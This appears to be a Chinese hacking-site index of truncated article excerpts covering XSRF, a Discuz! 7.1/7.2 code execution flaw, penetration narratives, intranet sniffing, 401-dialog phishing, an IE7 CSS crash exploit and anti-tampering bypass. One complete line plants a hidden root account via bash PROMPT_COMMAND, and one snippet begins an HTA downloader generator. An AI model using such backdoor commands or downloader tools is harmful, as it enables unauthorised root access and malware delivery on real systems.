文/饭
跨站请求伪造(cross-site request forgery)通常缩写为XSRF,直译为跨站请求伪造,即攻击者通过调用第三方网站的恶意脚本或者利用程序来伪造请求,当然并不需要向用户端伪装任何具有欺骗的内容,在用户不知情时攻击者直接利用用户的浏览器向攻击的应用程序提交一个已经预测好请求参数的操作数据包,利用的实质是劫持用户的会话状态,强行提交攻击者构造的具有“操作行为”的数据包。可以看出,最关键的是劫持用户的会话状态,所以说,导致XSRF漏洞的主要原因是会话状态的保持没有唯一时间特征的标识,即是说在使用HTTPCookie传送会话令牌的过程中,应该更谨慎的判断当前用户,而不是简单的通过操作数据包的Cookie值来鉴别,简单的说是每次数据交互时,对提交的数据包实行唯一性标识。
XSRF攻击流程大致如下:
[......]
文/oldjun
影响版本:Discuz! 7.1/7.2
漏洞分析:
下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:
一、漏洞来自showmessage函数:
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) { extract($GLOBALS, EXTR_SKIP);//危险的用法,未初始化的变量可以直接带进函数,直接导致了问题产生,from www.oldjun.com global [......] |
文/饭、Beach
渗透的主机是一朋友的,双线架设的虚拟主机,里面有几个站,架构是apache+php+mysql。在测试前,信息收集是很重要的。从系统信息、数据库信息、网络设备信息、管理员的信息等,都是值的统计分析和利用的。先对主机来端口扫描:
由图可知:这台服务器开放了80、443、5901等端口,开放了WEB、https、VNC等端口。由于是虚拟主机,确认其有多少个域名和网站,是旁注的第一步。使用虚拟主机站点查询工具,进行查询:
由上图可知,此IP上共有七个站点。随便浏览了这七个站点,其中有个站好像有问题。如下图:
很眼熟的phpcms标志。既然有主站在使用开源的CMS,值得“深入[......]
文/xi4oyu
要利用成功的话,还得看管理员的习惯,是否喜欢用su切换成root
BASH的环境变量
$PROMPT_COMMAND
这个变量保存了在主提示符$PS1显示之前需要执行的命令:
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND" |
[......]
文/饭 Beach
内网渗透在攻击层面,其实更趋向于社工和常规漏洞检测的结合,为了了解网内防护措施的设置是通过一步步的刺探和经验积累,有时判断出错,也能进入误区。但是如果能在网内进行嗅探,则能事半功倍,处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破,到控制整个内网的全过程来跟大家讨论,内网的渗透嗅探术和安全防护一些内容。
在寻找突破时,更多的是从应用服务来,而应用服务最直观的信息采集,就是端口扫描,不同的应用,开放的服务不一样。所以,在对网络进行信息收集时,大概分为这样两步: 端口探测,程序指纹分析。在端口探测方面,个人喜欢用SuperScan来快速对网段里的应用进行判断,如图:
在掌握端口信息后,就要对服务应用程序的指纹进行分析,主要包括版本号、已知的漏洞信息、常规配置信息、针对此应用流行的攻击方法等。本文试着对网内一台提供WEB服务的主机作为突破口,提交一个畸形的请求,如图:[......]
文/lcx
以下代码保存成hta文件,可生成js和vbs下载者
<script type="text/javascript"><!--mce:0--></script> <h4>1.生成下载用的xml文件</h4> 选择下载的exe文件: <input id="file1" name="file1" size="20" type="file" /> 保存路径 <input id="pathname"[......] |
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 “BiG TiME”
“Go fetch your FreeBSD r00tkitz” // http://www.youtube.com/watch?v=dDnhthI27Fg
There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t[......]
文/饭
在这充满诱惑的网络,恶意攻击者的攻击手法层出不穷。而其中颇具难度的社会工程攻击在取得用户的信任的手段方面,往往更倾向于伪装用户服务提供商,或者是在用户交互时,直接进行欺骗。比较典型的网络钓鱼攻击是将用户引诱到一个通过精心设计与用户信任非常相似的钓鱼网站,让用户在不易察觉的情况下提供用户的个人敏感信息。在2004年,国内也曾出现过假冒银行的网站,比如假冒中国工商银行的网站。而这一篇文章,将主要介绍HTML语言里的图片标签引用而诱引的验证漏洞和其伪装的过程。
在milw0rm.com网站,petros发布一篇题为《Image Authentication Injection Paper + PoC》的文章,里头提到通过创建一个php文件向客户端的浏览器发送401未经授权的状态而导致浏览器显示一个登录对话框(显示给用户好像是从目标网站)发起的一个授权认证对话框,而恶意攻击者会诱使用户输入帐户或者密码之类的敏感信息从而导致钓鱼式的攻击。其流程如下:
HTTP是一种基于请求与响应模式的、无状态的、应用层的协议,客户端向服务器发送一个请求,请求头包含请求的方法、URL、协议版本、以及包含请求修饰符、客户 信息和内容的类似于MIME的消息结构。服务器以一个状态行作为响应,相应的内容包括消息协议的版本,成功或者错误编码加上包含服务器信息、实体元信息以及可能实体内容。对整个过程进行抓包:[......]
文/铱迅
1.漏洞介绍
在XHTML 1.0标准下,使用特殊构造的CSS样式,在Internet Explorer 7.0 打开特定的网页后,Internet Explorer 7.0将发生内存崩溃,EIP指针将访问0×70613e5b附近的内存区域。如果将0×70613e5b附近覆盖特殊的机器码,就可以执行任意命令。
2.漏洞危害(危害等级高)
黑客如果将含有“漏洞利用程序的网页”置于网站上,浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。
3.漏洞利用
1. 通过此漏洞执行Windows的calc命令示例(利用成功后将执行计算器程序)
点击查看:IE7.0 [......]
文/饭
继SQL注入盛行,许多网站首页招致恶意的篡改,人们迫切的需要一款解决网页防篡改问题的方案,许多公司相续推出了硬件和软件,比如文中提到的IGuard防篡改系统,防篡改的原理一般基于三种,分别是外挂轮询技术、核心内嵌技术、事件触发技术。外挂轮询技术是利用一个网页检测程序,以轮询方式读出要监控的网页,与真实网页相比较,来判断网页内容的完整性,对于被篡改的网页进行报警和实时恢复。核心内嵌技术是将篡改检测模块嵌在Web服务器软件里,它在每一个网页流出时都进行完整性检查,对于篡改网页进行实时访问阻断,并予以报警和恢复。事件触发技术是利用操作系统的文件系统接口,在网页文件的被修改时进行合法性检查,对于非法操作进行报警和恢复。对于一些技术性评估,可以从下面的表里得到一些信息。
图/三种技术评估对比表
由表可知,核心内嵌技术许是最好的防篡改解决方案了。只是在攻击手段层出不穷的今天,系统配置是否最佳和WEB应用层防护是否关乎全局,在都是些较关键的问题。
在检测一下网站时,从扫描结果得到一个[......]
